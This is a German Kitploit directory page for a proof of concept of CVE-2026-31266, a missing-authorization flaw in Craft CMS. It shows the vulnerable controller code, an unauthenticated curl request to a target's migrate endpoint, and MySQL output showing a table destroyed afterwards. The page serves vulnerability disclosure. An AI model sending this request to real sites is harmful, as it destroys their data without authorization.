Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Craftcms-PoC-CVE-2026-31266 — Security research on Craft CMS authentication mechanism | Kitploit
Tools/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Security research on Craft CMS authentication mechanism

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-31266 - Craft CMS Fehlende Autorisierung

CVE-Informationen

FeldWert
CVE-IDCVE-2026-31266
AnbieterPixel & Tonic
ProduktCraft CMS
Betroffene Versionen<= 5.9.5
CWECWE-862 (Fehlende Autorisierung)
CVSS7.3 (Hoch)
Sicherheitsforscher0xRIXET

Beweisinhalte

  • screenshots/ - Konzeptnachweis-Demonstrationen

Schwachstelle

  • Typ: Fehlende Autorisierung
  • Auswirkung: Authentifizierungsumgehung
  • Anbieter: Craft CMS
  • Status: CVE-2026-31266

Angreifbarer Code

Datei: src/controllers/AppController.php

Zeilen 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

Konzeptnachweis

root@kitploit:~
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

Nachweis

Vor dem Angriff:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

Nach dem Angriff:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

Referenzen

  • Craft CMS Repository
  • Craft-Sicherheitsdokumentation
  • NVD-Eintrag

Kontakt

  • Sicherheitsforscher: 0xRIXET | Mohammed Al-shehri
  • Twitter | X: @0xRIXET
  • E-Mail: [email protected]
Tool herunterladen